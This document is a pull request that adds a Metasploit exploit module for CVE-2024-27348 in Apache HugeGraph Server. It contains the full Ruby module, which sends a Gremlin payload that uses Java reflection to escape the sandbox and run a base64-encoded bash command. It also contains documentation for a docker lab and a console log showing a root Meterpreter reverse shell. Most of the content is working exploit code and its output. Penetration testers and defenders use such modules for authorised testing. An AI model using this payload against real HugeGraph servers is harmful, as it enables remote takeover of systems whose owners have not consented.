### PR TITLE
Apache HugeGraph Gremlin RCE (CVE-2024-27348)

### DIFF
--- a/documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md
@@ -9,7 +9,6 @@ To install a vulnerable instance via docker run the following command:
 docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0
 ```
 
-
 ## Verification Steps
 
 1. Start msfconsole

--- a/documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md
@@ -12,7 +12,7 @@ docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0
 ## Verification Steps
 
 1. Start msfconsole
-1. Do: `use exploit/multi/http/apache_hugegraph_gremlin_rce`
+1. Do: `use exploit/linux/http/apache_hugegraph_gremlin_rce`
 1. Set the `RHOST` and `LHOST` options
 1. Run the module
 1. Receive a Meterpreter session as the `root` user.
@@ -21,11 +21,11 @@ docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0
 ### Apache HugeGraph 1.0.0 docker instance
 ```
 
-msf6 exploit(multi/http/apache_hugegraph_gremlin_rce) > set rhost 127.0.0.1
+msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > set rhost 127.0.0.1
 rhost => 127.0.0.1
-msf6 exploit(multi/http/apache_hugegraph_gremlin_rce) > set lhost 172.16.199.1
+msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > set lhost 172.16.199.1
 lhost => 172.16.199.1
-msf6 exploit(multi/http/apache_hugegraph_gremlin_rce) > run
+msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > run
 
 [*] Started reverse TCP handler on 172.16.199.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)

--- a/documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md
@@ -1,0 +1,47 @@
+## Vulnerable Application
+This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in
+Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve
+RCE through Gremlin, resulting in complete control over the server
+
+### Setup
+To install a vulnerable instance via docker run the following command:
+```
+docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0
+```
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/multi/http/apache_hugegraph_gremlin_rce`
+1. Set the `RHOST` and `LHOST` options
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### Apache HugeGraph 1.0.0 docker instance
+```
+
+msf6 exploit(multi/http/apache_hugegraph_gremlin_rce) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 exploit(multi/http/apache_hugegraph_gremlin_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/http/apache_hugegraph_gremlin_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Apache HugeGraph version detected: 1.0.0
+[*] 127.0.0.1:9191 - Executing Automatic Target for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045380 bytes) to 172.16.199.1
+[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.1:53803) at 2024-07-29 13:59:20 -0700
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 11.4 (Linux 6.6.32-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

--- a/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
+++ b/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
@@ -1,0 +1,101 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache HugeGraph Gremlin RCE',
+        'Description' => %q{
+          This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in
+          Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve
+          RCE through Gremlin, resulting in complete control over the server
+        },
+        'Author' => [
+          '6right', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'URL', 'https://blog.securelayer7.net/remote-code-execution-in-apache-hugegraph/'],
+          [ 'CVE', '2024-27348']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => %w[unix linux],
+        'Privileged' => true,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-04-22',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET'
+    })
+
+    return CheckCode::Unknown('No response from the vulnerable endpoint /gremlin') unless res
+    return CheckCode::Unknown('The response from the vulnerable endpoint /gremlin was not 200') unless res.code == 200
+
+    version = res.get_json_document&.dig('version')
+    return CheckCode::Unknown('Unable able to determine the version of Apache HugeGraph') unless version
+
+    if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
+      CheckCode::Appears("Apache HugeGraph version detected: #{version}")
+    else
+      CheckCode::Safe("Apache HugeGraph version detected: #{version}")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Running exploit with payload: #{datastore['PAYLOAD']}")
+    commands = payload.encoded.split(';')
+    commands_array = commands.map do |command|
+      command.strip.split(' ')
+    end
+
+    class_name = rand_text_alpha(4..12)
+    thread_name = rand_text_alpha(4..12)
+    command_name = rand_text_alpha(4..12)
+    process_builder_name = rand_text_alpha(4..12)
+    start_method_name = rand_text_alpha(4..12)
+    constructor_name = rand_text_alpha(4..12)
+    field_name = rand_text_alpha(4..12)
+
+    commands_array.each do |cmd|
+      formatted_command = cmd.map { |element| "\"#{element}\"" }.join(', ')
+
+      data = {
+        'gremlin' => "Thread #{thread_name} = Thread.currentThread();Class #{class_name} = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");#{field_name}.setAccessible(true);#{field_name}.set(#{thread_name}, \"#{thread_name}\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);java.util.List #{command_name} = java.util.Arrays.asList(#{formatted_command});Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");#{start_method_name}.invoke(#{process_builder_name});",
+        'bindings' => {},
+        'language' => 'gremlin-groovy',
+        'aliases' => {}
+      }
+
+      res = send_request_cgi({
+        'uri' => '/gremlin',
+        'method' => 'POST',
+        'ctype' => 'application/json',
+        'data' => data.to_json
+      })
+
+      print_error('Unexpected response from the vulnerable exploit') unless res && res.code == 200
+    end
+  end
+end

--- a/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
+++ b/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
       return CheckCode::Appears("Apache HugeGraph version detected: #{version}")
     end
-    
+
     CheckCode::Safe("Apache HugeGraph version detected: #{version}")
   end
 

--- a/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
+++ b/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
@@ -65,10 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     print_status("#{peer} - Running exploit with payload: #{datastore['PAYLOAD']}")
-    commands = payload.encoded.split(';')
-    commands_array = commands.map do |command|
-      command.strip.split(' ')
-    end
+
+    cmd = "bash -c {echo,#{Rex::Text.encode_base64(payload.encoded)}}|{base64,-d}|bash"
+    commands_array = cmd.strip.split(' ')
 
     class_name = rand_text_alpha(4..12)
     thread_name = rand_text_alpha(4..12)
@@ -78,24 +77,21 @@ class MetasploitModule < Msf::Exploit::Remote
     constructor_name = rand_text_alpha(4..12)
     field_name = rand_text_alpha(4..12)
 
-    commands_array.each do |cmd|
-      formatted_command = cmd.map { |element| "\"#{element}\"" }.join(', ')
+    formatted_command = commands_array.map { |element| "\"#{element}\"" }.join(', ')
+    data = {
+      'gremlin' => "Thread #{thread_name} = Thread.currentThread();Class #{class_name} = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");#{field_name}.setAccessible(true);#{field_name}.set(#{thread_name}, \"#{thread_name}\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);java.util.List #{command_name} = java.util.Arrays.asList(#{formatted_command});Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");#{start_method_name}.invoke(#{process_builder_name});",
+      'bindings' => {},
+      'language' => 'gremlin-groovy',
+      'aliases' => {}
+    }
 
-      data = {
-        'gremlin' => "Thread #{thread_name} = Thread.currentThread();Class #{class_name} = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");#{field_name}.setAccessible(true);#{field_name}.set(#{thread_name}, \"#{thread_name}\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);java.util.List #{command_name} = java.util.Arrays.asList(#{formatted_command});Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");#{start_method_name}.invoke(#{process_builder_name});",
-        'bindings' => {},
-        'language' => 'gremlin-groovy',
-        'aliases' => {}
-      }
+    res = send_request_cgi({
+      'uri' => '/gremlin',
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => data.to_json
+    })
 
-      res = send_request_cgi({
-        'uri' => '/gremlin',
-        'method' => 'POST',
-        'ctype' => 'application/json',
-        'data' => data.to_json
-      })
-
-      print_error('Unexpected response from the vulnerable exploit') unless res && res.code == 200
-    end
+    print_error('Unexpected response from the vulnerable exploit') unless res && res.code == 200
   end
 end

--- a/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
+++ b/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
@@ -63,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
       return CheckCode::Appears("Apache HugeGraph version detected: #{version}")
     end
+    
     CheckCode::Safe("Apache HugeGraph version detected: #{version}")
   end
 

--- a/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
+++ b/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
@@ -43,6 +43,10 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     )
+    register_options([
+      Opt::RPORT(8080),
+      OptString.new('TARGETURI', [true, 'Base path to the Apache HugeGraph web application', '/'])
+    ])
   end
 
   def check
@@ -51,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     return CheckCode::Unknown('No response from the vulnerable endpoint /gremlin') unless res
-    return CheckCode::Unknown('The response from the vulnerable endpoint /gremlin was not 200') unless res.code == 200
+    return CheckCode::Unknown("The response from the vulnerable endpoint /gremlin was: #{res.code} (expected: 200)") unless res.code == 200
 
     version = res.get_json_document&.dig('version')
     return CheckCode::Unknown('Unable able to determine the version of Apache HugeGraph') unless version
@@ -86,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
     res = send_request_cgi({
-      'uri' => '/gremlin',
+      'uri' => normalize_uri(target_uri.path, '/gremlin'),
       'method' => 'POST',
       'ctype' => 'application/json',
       'data' => data.to_json

--- a/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
+++ b/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
@@ -61,17 +61,13 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('Unable able to determine the version of Apache HugeGraph') unless version
 
     if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
-      CheckCode::Appears("Apache HugeGraph version detected: #{version}")
-    else
-      CheckCode::Safe("Apache HugeGraph version detected: #{version}")
+      return CheckCode::Appears("Apache HugeGraph version detected: #{version}")
     end
+    CheckCode::Safe("Apache HugeGraph version detected: #{version}")
   end
 
   def exploit
     print_status("#{peer} - Running exploit with payload: #{datastore['PAYLOAD']}")
-
-    cmd = "bash -c {echo,#{Rex::Text.encode_base64(payload.encoded)}}|{base64,-d}|bash"
-    commands_array = cmd.strip.split(' ')
 
     class_name = rand_text_alpha(4..12)
     thread_name = rand_text_alpha(4..12)
@@ -81,9 +77,22 @@ class MetasploitModule < Msf::Exploit::Remote
     constructor_name = rand_text_alpha(4..12)
     field_name = rand_text_alpha(4..12)
 
-    formatted_command = commands_array.map { |element| "\"#{element}\"" }.join(', ')
+    java_payload = <<~PAYLOAD
+      Thread #{thread_name} = Thread.currentThread();
+      Class #{class_name} = Class.forName(\"java.lang.Thread\");
+      java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");
+      #{field_name}.setAccessible(true);
+      #{field_name}.set(#{thread_name}, \"#{thread_name}\");
+      Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");
+      java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);
+      java.util.List #{command_name} = java.util.Arrays.asList(#{"bash -c {echo,#{Rex::Text.encode_base64(payload.encoded)}}|{base64,-d}|bash".strip.split(' ').map { |element| "\"#{element}\"" }.join(', ')});
+      Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});
+      java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");
+      #{start_method_name}.invoke(#{process_builder_name});
+    PAYLOAD
+
     data = {
-      'gremlin' => "Thread #{thread_name} = Thread.currentThread();Class #{class_name} = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");#{field_name}.setAccessible(true);#{field_name}.set(#{thread_name}, \"#{thread_name}\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);java.util.List #{command_name} = java.util.Arrays.asList(#{formatted_command});Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");#{start_method_name}.invoke(#{process_builder_name});",
+      'gremlin' => java_payload,
       'bindings' => {},
       'language' => 'gremlin-groovy',
       'aliases' => {}


### PR DESCRIPTION
This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve RCE through Gremlin, resulting in complete control over the server. 

## Vulnerable Target Setup
```
docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0
```

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Do: `use linux/http/apache_hugegraph_gremlin_rce`
- [ ] Set the `RHOST` and `LHOST` options
- [ ] Run the module
- [ ] Receive a Meterpreter session as the `root` user.

